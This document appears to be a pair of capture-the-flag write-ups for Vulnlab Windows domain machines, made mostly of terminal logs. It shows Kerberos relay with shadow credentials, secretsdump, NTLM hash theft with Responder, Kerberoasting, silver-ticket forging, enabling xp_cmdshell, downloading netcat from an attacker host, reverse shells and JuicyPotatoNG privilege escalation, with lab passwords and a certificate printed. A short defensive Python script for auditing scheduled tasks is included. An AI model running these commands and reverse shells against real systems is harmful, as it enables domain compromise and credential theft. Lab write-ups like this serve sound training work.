*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         6/29/2022   3:00 PM             37 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
VL{b52<REDACTED>a7d}
*Evil-WinRM* PS C:\Users\Administrator\Desktop> 

Getting Root with Shadow Credentials (KrbRelayUp & Rubeus)

I used: https://github.com/Flangvik/SharpCollection/blob/master/NetFramework_4.7_Any/KrbRelayUp.exe & Rubeus.exe

Valid CLSID from: https://vulndev.io/cheats-windows/

Also, LDAP signing must not be enforced, and the MachineAccountQuota must still allow us to add a machine account.

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ crackmapexec ldap bruno.vl -u 'svc_scan' -p 'Sunshine1' -M ldap-checker
SMB         brunodc.bruno.vl 445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP        brunodc.bruno.vl 389    BRUNODC          [+] bruno.vl\svc_scan:Sunshine1 
LDAP-CHE... brunodc.bruno.vl 389    BRUNODC          LDAP Signing NOT Enforced!
LDAP-CHE... brunodc.bruno.vl 389    BRUNODC          Channel Binding is set to "NEVER" - Time to PWN!
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ crackmapexec ldap bruno.vl -u 'svc_scan' -p 'Sunshine1' -M maq         
SMB         brunodc.bruno.vl 445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
LDAP        brunodc.bruno.vl 389    BRUNODC          [+] bruno.vl\svc_scan:Sunshine1 
MAQ         brunodc.bruno.vl 389    BRUNODC          [*] Getting the MachineAccountQuota
MAQ         brunodc.bruno.vl 389    BRUNODC          MachineAccountQuota: 10

 

PS C:\temp> .\KrbRelayUp.exe full -m shadowcred -cls d99e6e73-fc88-11d0-b498-00a0c90312f3 -p 10246
.\KrbRelayUp.exe full -m shadowcred -cls d99e6e73-fc88-11d0-b498-00a0c90312f3 -p 10246
KrbRelayUp - Relaying you to SYSTEM


[+] Rewriting function table
[+] Rewriting PEB
[+] Init COM server
[+] Register COM server
[+] Forcing SYSTEM authentication
[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now...
[+] LDAP session established
[+] Generating certificate
[+] Certificate generated
[+] Generating KeyCredential
[+] KeyCredential generated with DeviceID 0367120a-5b1f-4343-92e6-87879f2831b7
[+] KeyCredential added successfully
[+] Certificate: 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
[+] Certificate Password: tL4#hQ9=yQ9$
[+] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN="CN=BRUNODC", OU=Domain Controllers, DC=bruno, DC=vl 
[+] Building AS-REQ (w/ PKINIT preauth) for: 'bruno.vl\BRUNODC$'
[+] TGT request successful!
[+] Building S4U2self 
[+] Using domain controller: brunodc.bruno.vl (fe80::65c9:b4fb:c500:8a8b%6)
[+] Sending S4U2self request to fe80::65c9:b4fb:c500:8a8b%6:88
[+] S4U2self success!
[+] Got a TGS for 'Administrator' to 'BRUNODC$@BRUNO.VL'
[+] Substituting in alternate service name: HOST/BRUNODC
[+] Importing ticket into a sacrificial process using CreateNetOnly
[+] Process         : 'C:\temp\KrbRelayUp.exe krbscm --ServiceName "KrbSCM"' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 4192
[+] Ticket successfully imported!
[+] LUID            : 0x3de849
[+] System service should be started in background
PS C:\temp> ./Rubeus.exe asktgt /user:brunodc$ /certificate:--snip-- /password:tL4#hQ9=yQ9$ /enctype:AES256 /nowrap
./Rubeus.exe asktgt /user:brunodc$ /certificate:--snip-- /password:tL4#hQ9=yQ9$ /enctype:AES256 /nowrap

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2 

[*] Action: Ask TGT

[*] Got domain: bruno.vl
[*] Using salt: BRUNO.VLhostbrunodc.bruno.vl
[*] Using PKINIT with etype aes256_cts_hmac_sha1 and subject: CN="CN=BRUNODC", OU=Domain Controllers, DC=bruno, DC=vl 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'bruno.vl\brunodc$'
[*] Using domain controller: fe80::65c9:b4fb:c500:8a8b%6:88
[+] TGT request successful!
[*] base64(ticket.kirbi):


  ServiceName              :  krbtgt/bruno.vl
  ServiceRealm             :  BRUNO.VL
  UserName                 :  brunodc$ (NT_PRINCIPAL)
  UserRealm                :  BRUNO.VL
  StartTime                :  6/10/2024 11:45:03 AM
  EndTime                  :  6/10/2024 9:45:03 PM
  RenewTill                :  6/17/2024 11:45:03 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  aes256_cts_hmac_sha1
  Base64(key)              :  vdTKMjX5qHweT0c+CbsOSLpJQHmRr0I5Uh/fI0wx5BQ=
  ASREP (key)              :  F312EF7E042FED8F03C8862145DAAD54EC9A2CB14C510C885EADA1BBAF3D5C9B

PS C:\temp> 

.

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ nano bruno.ticket
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ cat bruno.ticket | base64 -d > bruno.ticket.kirbi
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ impacket-ticketConverter bruno.ticket.kirbi bruno.ticket.ccache
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] converting kirbi to ccache...
[+] done
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ export KRB5CCNAME=bruno.ticket.ccache               
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ klist
Command 'klist' not found, did you mean:
  command 'flist' from deb mmh
  command 'flist' from deb nmh
  command 'mlist' from deb mblaze
Try: sudo apt install <deb name>
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ impacket-secretsdump 'brunodc$'@brunodc.bruno.vl -k -no-pass 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up... 
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/bruno]

 

Beyond root

*Evil-WinRM* PS C:\windows\system32\tasks> hostname
brunodc
*Evil-WinRM* PS C:\windows\system32\tasks>  Get-MpComputerStatus


AMEngineVersion                  : 0.0.0.0
AMProductVersion                 : 4.18.2203.5
AMRunningMode                    : Not running
AMServiceEnabled                 : False
AMServiceVersion                 : 0.0.0.0
AntispywareEnabled               : False
AntispywareSignatureAge          : 4294967295
AntispywareSignatureLastUpdated  :
AntispywareSignatureVersion      : 0.0.0.0
AntivirusEnabled                 : False
AntivirusSignatureAge            : 4294967295
...            :



*Evil-WinRM* PS C:\windows\system32\tasks> type scanner
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2022-06-29T13:50:49.3977635</Date>
    <Author>BRUNO\administrator</Author>
    <URI>\scanner</URI>
  </RegistrationInfo>
  <Triggers>
    <BootTrigger>
      <Repetition>
        <Interval>PT1M</Interval>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
      <Enabled>true</Enabled>
      <Delay>PT1M</Delay>
    </BootTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <RunLevel>LeastPrivilege</RunLevel>
      <UserId>svc_scan</UserId>
      <LogonType>Password</LogonType>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\samples\app\SampleScanner.exe</Command>
    </Exec>
  </Actions>
</Task>
*Evil-WinRM* PS C:\windows\system32\tasks> 
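The task definition above is what a reviewer of a DC would want summarised: which account it runs as, how that account logs on, what binary it launches and when. This added example (mine, not from the writeup) parses a Task Scheduler XML file the way the files under C:\Windows\System32\Tasks are stored and lists the review findings; the embedded sample is the scanner task shown above, trimmed to the elements the audit reads.

```python
"""Audit a Windows Task Scheduler XML definition for principal, logon type,
action and triggers. Added example, not part of the writeup."""
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Locations where only administrators can write by default; a task binary
# anywhere else needs its ACL checked so a low-privileged user cannot replace it.
PROTECTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
BUILTIN_IDENTITIES = {"SYSTEM", "LOCAL SERVICE", "NETWORK SERVICE",
                      "S-1-5-18", "S-1-5-19", "S-1-5-20"}


def audit_task(xml_bytes: bytes) -> dict:
    """Return the task's principal, action and trigger details plus findings."""
    root = ET.fromstring(xml_bytes)  # expat honours the UTF-16 BOM Windows writes

    def text(path: str):
        el = root.find(path, NS)
        return el.text.strip() if el is not None and el.text else None

    info = {
        "uri": text("t:RegistrationInfo/t:URI"),
        "user": text("t:Principals/t:Principal/t:UserId"),
        "logon_type": text("t:Principals/t:Principal/t:LogonType"),
        "run_level": text("t:Principals/t:Principal/t:RunLevel"),
        "command": text("t:Actions/t:Exec/t:Command"),
        "arguments": text("t:Actions/t:Exec/t:Arguments"),
        "boot_trigger": root.find("t:Triggers/t:BootTrigger", NS) is not None,
        "repeat_interval": text("t:Triggers/t:BootTrigger/t:Repetition/t:Interval"),
        "findings": [],
    }
    findings = info["findings"]
    user = (info["user"] or "").upper()
    if info["logon_type"] == "Password":
        # "Password" logon means the scheduler keeps the account's password so the
        # task can run while nobody is logged on; the host now holds that secret.
        findings.append(
            f"LogonType=Password: the password of {info['user']} is stored on this "
            "host for non-interactive logon; treat it as exposed to every local admin")
    if user and user not in BUILTIN_IDENTITIES and not user.endswith("$"):
        findings.append(f"runs as a named account ({info['user']}), not a service or "
                        "virtual account; review its group memberships and SPNs")
    cmd = (info["command"] or "").lower().strip('"')
    if cmd and not cmd.startswith(PROTECTED_PREFIXES):
        findings.append(f"command {info['command']} is outside the protected system "
                        "directories; verify only administrators can write there")
    if info["boot_trigger"]:
        every = f", repeating every {info['repeat_interval']}" if info["repeat_interval"] else ""
        findings.append(f"starts at boot{every}: it runs unattended and re-launches itself")
    return info


# The scanner task from the DC above, trimmed to the parts the audit reads and
# encoded as UTF-16 with a BOM, the way Windows stores task files.
SCANNER_TASK = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>BRUNO\\administrator</Author><URI>\\scanner</URI></RegistrationInfo>
  <Triggers><BootTrigger><Repetition><Interval>PT1M</Interval></Repetition>
    <Enabled>true</Enabled><Delay>PT1M</Delay></BootTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>LeastPrivilege</RunLevel>
    <UserId>svc_scan</UserId><LogonType>Password</LogonType></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\\samples\\app\\SampleScanner.exe</Command></Exec></Actions>
</Task>""".encode("utf-16")

if __name__ == "__main__":
    report = audit_task(SCANNER_TASK)
    print(f"{report['uri']}: runs {report['command']} as {report['user']} ({report['logon_type']})")
    for item in report["findings"]:
        print(" -", item)
```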

 

.

 

vulnlab-breach

vulnlab breach

a Medium Windows machine

tools used : ntlm_theft.py , impacket-getPac , impacket-GetUserSPNs , ldapdomaindump , impacket-mssqlclient , JuicyPotatoNG.exe

.

We create a bunch of files that will lead to an NTLMv2 hash-stealing attack, using this tool: https://github.com/Greenwolf/ntlm_theft

python ntlm_theft.py -g all -s 10.10.97.69 -f puckie

.

┌──(puck㉿kali)-[~/vulnlab/breach]
sudo responder -I tun0

                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx


[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.8.2.138]
    Responder IPv6             [fe80::e718:d192:5032:1452]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-88BT76XF41N]
    Responder Domain Name      [FBHG.LOCAL]
    Responder DCE-RPC Port     [49865]

[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.97.69
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:1fa52157fd1fca3b --snip--
[*] Skipping previously captured hash for BREACH\Julia.Wong

as Julia.Wong

┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-getPac -targetUser administrator breach.vl/julia.wong:Computer1       
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

KERB_VALIDATION_INFO 
LogonTime:                      
    dwLowDateTime:                   2560514102 
    dwHighDateTime:                  30942228 
LogoffTime:                     
--snip--

Domain SID: S-1-5-21-2330692793-3312915120-706255856

 0000   10 00 00 00 F5 18 12 7A  3C 36 13 6A 18 C4 BD 3F   .......z<6.j...?
                                                                                                                     

 

┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-GetUserSPNs breach.vl/julia.wong:Computer1 -dc-ip 10.10.97.69 -request 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

ServicePrincipalName              Name       MemberOf  PasswordLastSet             LastLogon                   Delegation 
--------------------------------  ---------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/breachdc.breach.vl:1433  svc_mssql            2022-02-17 05:43:08.106169  2024-06-07 05:23:44.260778             



$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$a497b878287c08cf634ef3530131743b$ --snip--
                                                                                                                     

Getting more users

┌──(puck㉿kali)-[~/vulnlab/breach]
ldapdomaindump breach.vl -u 'breach\Julia.Wong' -p 'Computer1'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
                                                                                                                     
cat domain_users.grep | grep svc 
svc_mssql svc_mssql svc_mssql Domain Users 02/17/22 10:43:07 06/07/24 13:34:45 06/07/24 13:34:45 NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD 02/17/22 10:43:08 S-1-5-21-2330692793-3312915120-706255856-1115

bloodhound-python -d breach.vl -u 'Julia.Wong' -p 'Computer1' -c all -ns 10.10.97.69 

Silver ticket creation with the NTLM hash of the svc_mssql user:

In order to forge a silver ticket we need three things: the domain SID, the service account's NTLM hash, and the service's SPN.

┌──(puck㉿kali)-[~/vulnlab/breach]
iconv -f ASCII -t UTF-16LE <(printf "Trustno1") | openssl dgst -md4 
MD4(stdin)= 69596c7aa1e8daee17f8e78870e25a5c


impacket-ticketer -nthash 69596c7aa1e8daee17f8e78870e25a5c -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -dc-ip breachdc -spn MSSQLSvc/breachdc.breach.vl:1433 administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breach.vl/administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in administrator.ccache
                                                                                                                     
export KRB5CCNAME=administrator.ccache

.

┌──(puck㉿kali)-[~/vulnlab/breach]
impacket-mssqlclient -k breachdc.breach.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (BREACH\Administrator  dbo@master)> 

.

 

SQL stuff

SQL (BREACH\Administrator  dbo@master)> sp_configure 'show advanced options', '1'
[*] INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator  dbo@master)> RECONFIGURE
SQL (BREACH\Administrator  dbo@master)> sp_configure 'xp_cmdshell', '1'
[*] INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator  dbo@master)> RECONFIGURE
SQL (BREACH\Administrator  dbo@master)> xp_cmdshell dir "C:\"
output                                                       
----------------------------------------------------------   
 Volume in drive C has no label.                             

 Volume Serial Number is B465-02B6                           

NULL                                                         

 Directory of C:\                                            

NULL                                                         

08/19/2021  06:24 AM    <DIR>          EFI                   

02/17/2022  09:55 AM    <DIR>          inetpub               

05/08/2021  08:20 AM    <DIR>          PerfLogs              

02/17/2022  10:28 AM    <DIR>          Program Files         

02/17/2022  10:27 AM    <DIR>          Program Files (x86)   

02/17/2022  02:11 PM    <DIR>          share                 

02/17/2022  01:12 PM    <DIR>          Users                 

02/17/2022  03:35 PM    <DIR>          Windows               

               0 File(s)              0 bytes                

               8 Dir(s)  11,722,678,272 bytes free           

NULL                                                       

                         

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell powershell -c "wget -usebasicparsing http://10.8.2.138:8000/nc64.exe -o C:\Temp\nc64.exe"
output   
------   
NULL     

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell dir "C:\Temp"
output                                               
--------------------------------------------------   
 Volume in drive C has no label.                     

 Volume Serial Number is B465-02B6                   

NULL                                                 

 Directory of C:\Temp                                

NULL                                                 

06/07/2024  10:34 AM    <DIR>          .             

06/07/2024  10:34 AM            45,272 nc64.exe      

               1 File(s)         45,272 bytes        

               1 Dir(s)  11,754,811,392 bytes free   

NULL                                                 

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell powershell -c "C:\Temp\nc64.exe -e cmd 10.8.2.138 4444"


 

 

.

 

Privesc with JuicyPotatoNG

┌──(puck㉿kali)-[~/vulnlab/breach]
└─$ nc -nlvp 4444 
listening on [any] 4444 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.97.69] 59869
Microsoft Windows [Version 10.0.20348.558]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
breach\svc_mssql

C:\Windows\system32>whoami /all
whoami /all

USER INFORMATION
----------------

User Name        SID                                          
================ =============================================
breach\svc_mssql S-1-5-21-2330692793-3312915120-706255856-1115


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                                             Attributes                                        
========================================== ================ =============================================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                                         Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                                    Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6                                                         Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                                        Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQL$SQLEXPRESS                Well-known group S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 Enabled by default, Enabled group, Group owner    
LOCAL                                      Well-known group S-1-2-0                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                                     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288                                                                                                      


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

C:\Windows\system32>cd c:\temp
cd c:\temp

c:\Temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Temp> wget -usebasicparsing http://10.8.2.138:8000/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
wget -usebasicparsing http://10.8.2.138:8000/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
PS C:\Temp> dir
dir

    Directory: C:\Temp

Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          6/7/2024  11:08 AM         153600 JuicyPotatoNG.exe                                                    
-a----          6/7/2024  10:34 AM          45272 nc64.exe                                                             


PS C:\Temp> .\JuicyPotatoNG.exe -t * -p .\nc64.exe -l 443 -a "-e cmd 10.8.2.138 445"
.\JuicyPotatoNG.exe -t * -p .\nc64.exe -l 443 -a "-e cmd 10.8.2.138 445"
PS C:\Temp>

.

┌──(puck㉿kali)-[~/vulnlab/breach]
rlwrap nc -nlvp 445
listening on [any] 445 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.97.69] 64454
Microsoft Windows [Version 10.0.20348.558]
(c) Microsoft Corporation. All rights reserved.

C:\>whoami
whoami
